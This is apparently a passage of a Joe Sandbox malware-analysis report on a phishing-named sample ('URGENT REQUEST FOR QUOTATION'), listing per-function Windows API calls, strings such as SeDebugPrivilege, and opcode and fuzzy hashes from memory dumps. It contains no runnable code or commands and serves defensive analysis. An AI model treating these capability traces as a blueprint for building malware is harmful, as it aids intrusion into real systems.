                                                                                                                      • Instruction Fuzzy Hash: 5671DD34804205DFCF268F64CD84EBE3BF5FF4A325F188269E9595A2A6C7389881DF51
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 000A35E4
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                      • LoadStringW.USER32(00102390,?,00000FFF,?), ref: 000A360A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadString$_wcslen
                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                      • API String ID: 4099089115-2391861430
                                                                                                                      • Opcode ID: eb0dc84460ee1559c2c40daf45534c07ac3b42cc9b39d80c8d7eb68dd5f1789a
                                                                                                                      • Instruction ID: b08159f9a6970f7f2e0b40ba690a08b060010352866397118bb640d68c039506
                                                                                                                      • Opcode Fuzzy Hash: eb0dc84460ee1559c2c40daf45534c07ac3b42cc9b39d80c8d7eb68dd5f1789a
                                                                                                                      • Instruction Fuzzy Hash: D2516E71804209BBDF15EBE0CC82EEDBB78AF05310F145125F205761A2EB711B99DFA1
                                                                                                                      APIs
                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000AC272
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000AC29A
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000AC2CA
                                                                                                                      • GetLastError.KERNEL32 ref: 000AC322
                                                                                                                      • SetEvent.KERNEL32(?), ref: 000AC336
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 000AC341
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3113390036-3916222277
                                                                                                                      • Opcode ID: f60c3c1cfd8f59c054cb2cfcac2b7c68ad2f581e155bf8fa0e3c816f3ef7c0e4
                                                                                                                      • Instruction ID: eabc88df7c123f4bff00898a0ba863c7d2f8aec66835cf218a385abb8559e2b1
                                                                                                                      • Opcode Fuzzy Hash: f60c3c1cfd8f59c054cb2cfcac2b7c68ad2f581e155bf8fa0e3c816f3ef7c0e4
                                                                                                                      • Instruction Fuzzy Hash: 60317FB2504604AFFB219FA4CC88EAB7BFCEB4A744F15851EF44AD6201DB34DE059B60
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00073AAF,?,?,Bad directive syntax error,000CCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 000998BC
                                                                                                                      • LoadStringW.USER32(00000000,?,00073AAF,?), ref: 000998C3
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00099987
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                      • API String ID: 858772685-4153970271
                                                                                                                      • Opcode ID: 5695d961f952a42be06af3ac097170ba5f41d4616e44b21eb615fbc6fb32ca9c
                                                                                                                      • Instruction ID: e4d4b2ba0b96a9902762ca0244648191305d79230c6f3da5b4bd9ef137bff797
                                                                                                                      • Opcode Fuzzy Hash: 5695d961f952a42be06af3ac097170ba5f41d4616e44b21eb615fbc6fb32ca9c
                                                                                                                      • Instruction Fuzzy Hash: 59215E3184021EABDF16AF94CC46EEE7779FF18300F044469F619660A2EB75AA18EB50
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32 ref: 000920AB
                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 000920C0
                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0009214D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameParentSend
                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                      • API String ID: 1290815626-3381328864
                                                                                                                      • Opcode ID: 3eb35731134b9866e10559de4ba1b8161ee020c148a2b9b32e6f1da96e44c64a
                                                                                                                      • Instruction ID: 9e3ed4af8df75a74c266fd6f48926b3993a564105d3bb350367ec8d50b8ef90f
                                                                                                                      • Opcode Fuzzy Hash: 3eb35731134b9866e10559de4ba1b8161ee020c148a2b9b32e6f1da96e44c64a
                                                                                                                      • Instruction Fuzzy Hash: 7F11EC7A688706BAFE116720DC07DFB37DCDB15726F200116FB04A90E2FFA558557614
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9ee3ca9e03840b01c7f71f2bc98c8a309733d74a6c86b6862fcb4c218ff386c1
                                                                                                                      • Instruction ID: 64925fcf7e326d840ddc240013e141eac246c497ad2e8fe0d16f71647c6cfce6
                                                                                                                      • Opcode Fuzzy Hash: 9ee3ca9e03840b01c7f71f2bc98c8a309733d74a6c86b6862fcb4c218ff386c1
                                                                                                                      • Instruction Fuzzy Hash: 14C10474D04249AFEF21DFA8C845BEDBBF6AF09310F044199E855A7392CB748D41CB60
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1282221369-0
                                                                                                                      • Opcode ID: d6bdfaeeb4417692bd2d548e869578b2be0330c3e649b909f798b73ce2029d0d
                                                                                                                      • Instruction ID: 1741abb00b9734ea0f05e2114653837793e1eb24416a971899a8c3c5766010e0
                                                                                                                      • Opcode Fuzzy Hash: d6bdfaeeb4417692bd2d548e869578b2be0330c3e649b909f798b73ce2029d0d
                                                                                                                      • Instruction Fuzzy Hash: 8F611971A04601AFEB25AFB49841FBE7BE7AF05350F04417EF98597242DA369E4187A0
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 000C5186
                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 000C51C7
                                                                                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 000C51CD
                                                                                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 000C51D1
                                                                                                                        • Part of subcall function 000C6FBA: DeleteObject.GDI32(00000000), ref: 000C6FE6
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C520D
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000C521A
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 000C524D
                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 000C5287
                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 000C5296
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3210457359-0
                                                                                                                      • Opcode ID: 39b234cb16905c7921fee5c8db7bf802852ab807337f129d23c5474a6cf46d6a
                                                                                                                      • Instruction ID: 87acc9f074f1e341ce06a1549987f048ecb433208b9e574cb4286ace98a95a6a
                                                                                                                      • Opcode Fuzzy Hash: 39b234cb16905c7921fee5c8db7bf802852ab807337f129d23c5474a6cf46d6a
                                                                                                                      • Instruction Fuzzy Hash: 0E517C38A40A08BEEB309F24CC49FDD7BE5EB46326F584119FA19962E1D775B9C0DB40
                                                                                                                      APIs
                                                                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00086890
                                                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 000868A9
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000868B9
                                                                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 000868D1
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000868F2
                                                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00048874,00000000,00000000,00000000,000000FF,00000000), ref: 00086901
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0008691E
                                                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00048874,00000000,00000000,00000000,000000FF,00000000), ref: 0008692D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1268354404-0
                                                                                                                      • Opcode ID: 6dafdfae072e3c8e24a42bd24f1f8ec22f39a3e1cdcfaf8e46fa3a9e334745a6
                                                                                                                      • Instruction ID: d06ff88c92382ad4269b04c9f602de5f2fb15b9b7c1d1b79012bd4e43d49b41c
                                                                                                                      • Opcode Fuzzy Hash: 6dafdfae072e3c8e24a42bd24f1f8ec22f39a3e1cdcfaf8e46fa3a9e334745a6
                                                                                                                      • Instruction Fuzzy Hash: C5515AB0600205EFEB20DF24CC55FAE7BB5FB44750F108628F996972A0DB75E990DB94
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000AC182
                                                                                                                      • GetLastError.KERNEL32 ref: 000AC195
                                                                                                                      • SetEvent.KERNEL32(?), ref: 000AC1A9
                                                                                                                        • Part of subcall function 000AC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000AC272
                                                                                                                        • Part of subcall function 000AC253: GetLastError.KERNEL32 ref: 000AC322
                                                                                                                        • Part of subcall function 000AC253: SetEvent.KERNEL32(?), ref: 000AC336
                                                                                                                        • Part of subcall function 000AC253: InternetCloseHandle.WININET(00000000), ref: 000AC341
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 337547030-0
                                                                                                                      • Opcode ID: ce1c52117203a57327d56b0312b7da77226c0ff49cf15af7341888862cb19124
                                                                                                                      • Instruction ID: 9c888ac863141b38a524e2384d632c8a6e02283ba8e92b7cb61aaa40a126d023
                                                                                                                      • Opcode Fuzzy Hash: ce1c52117203a57327d56b0312b7da77226c0ff49cf15af7341888862cb19124
                                                                                                                      • Instruction Fuzzy Hash: 7B31BE71200645AFFB219FE5DD04EAABBF8FF1A300B05452EF95A86610D735E810DBA0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00093A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00093A57
                                                                                                                        • Part of subcall function 00093A3D: GetCurrentThreadId.KERNEL32 ref: 00093A5E
                                                                                                                        • Part of subcall function 00093A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000925B3), ref: 00093A65
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000925BD
                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000925DB
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 000925DF
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000925E9
                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00092601
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00092605
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0009260F
                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00092623
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00092627
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2014098862-0
                                                                                                                      • Opcode ID: 260cda2da3b8de5cbd366892a457d085662a199ace28fd4b4a20910ab3e77f3f
                                                                                                                      • Instruction ID: 2297a3c54597f6413d42c50a0d0bedc68d6da82e4f207af73ec04683fa05ccc6
                                                                                                                      • Opcode Fuzzy Hash: 260cda2da3b8de5cbd366892a457d085662a199ace28fd4b4a20910ab3e77f3f
                                                                                                                      • Instruction Fuzzy Hash: B101F230790610BBFB206769DC8AF993F59DF4EB12F110001F318AF1E2C9F22444DAAA
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00091449,?,?,00000000), ref: 0009180C
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00091449,?,?,00000000), ref: 00091813
                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00091449,?,?,00000000), ref: 00091828
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00091449,?,?,00000000), ref: 00091830
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00091449,?,?,00000000), ref: 00091833
                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00091449,?,?,00000000), ref: 00091843
                                                                                                                      • GetCurrentProcess.KERNEL32(00091449,00000000,?,00091449,?,?,00000000), ref: 0009184B
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00091449,?,?,00000000), ref: 0009184E
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00091874,00000000,00000000,00000000), ref: 00091868
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1957940570-0
                                                                                                                      • Opcode ID: 988dc9d0380e7eaa1fdc3bc85dad13b1867fd34d91671d5bcbfbb982e5167f0a
                                                                                                                      • Instruction ID: e77362e85b62c784bc5f8b533100d9aed017eedf83cd1aa7534de967fd0a4358
                                                                                                                      • Opcode Fuzzy Hash: 988dc9d0380e7eaa1fdc3bc85dad13b1867fd34d91671d5bcbfbb982e5167f0a
                                                                                                                      • Instruction Fuzzy Hash: 0001BBB5240348BFF710ABA6DC4DF6B3BACEB8AB11F044411FA09DB1A1CA749800CB20
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0009D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0009D501
                                                                                                                        • Part of subcall function 0009D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0009D50F
                                                                                                                        • Part of subcall function 0009D4DC: CloseHandle.KERNEL32(00000000), ref: 0009D5DC
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000BA16D
                                                                                                                      • GetLastError.KERNEL32 ref: 000BA180
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000BA1B3
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 000BA268
                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 000BA273
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000BA2C4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                      • Opcode ID: 3d02591d8c66173df777c9d88fb45191e5d256c3bd6db97610d3a9e6987ce72f
                                                                                                                      • Instruction ID: 14bab7f3154b8e1a7af7423a310a3b76818b980c0aed777553de2f20c8d222b1
                                                                                                                      • Opcode Fuzzy Hash: 3d02591d8c66173df777c9d88fb45191e5d256c3bd6db97610d3a9e6987ce72f
                                                                                                                      • Instruction Fuzzy Hash: B5619130204242AFE720DF19C494F99BBE5AF55318F18849CE45A8BBA3C776ED45CB92
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 000C3925
                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 000C393A
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 000C3954
                                                                                                                      • _wcslen.LIBCMT ref: 000C3999
                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 000C39C6
                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 000C39F4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window_wcslen
                                                                                                                      • String ID: SysListView32
                                                                                                                      • API String ID: 2147712094-78025650
                                                                                                                      • Opcode ID: 903011e81ae142259498ef190e6e234db7011f2ff63e10901466cd4cb801fcc8
                                                                                                                      • Instruction ID: 5128c7a4ef4d3a25f695c0837f5df19860282b2bca2791b9510d5e0ba328ffd5
                                                                                                                      • Opcode Fuzzy Hash: 903011e81ae142259498ef190e6e234db7011f2ff63e10901466cd4cb801fcc8
                                                                                                                      • Instruction Fuzzy Hash: CD41C231A10319ABEF219F64CC45FEE7BA9EF08350F10452AF948E7281D7B59E84CB90
                                                                                                                      APIs
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0009BCFD
                                                                                                                      • IsMenu.USER32(00000000), ref: 0009BD1D
                                                                                                                      • CreatePopupMenu.USER32 ref: 0009BD53
                                                                                                                      • GetMenuItemCount.USER32(018B5390), ref: 0009BDA4
                                                                                                                      • InsertMenuItemW.USER32(018B5390,?,00000001,00000030), ref: 0009BDCC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
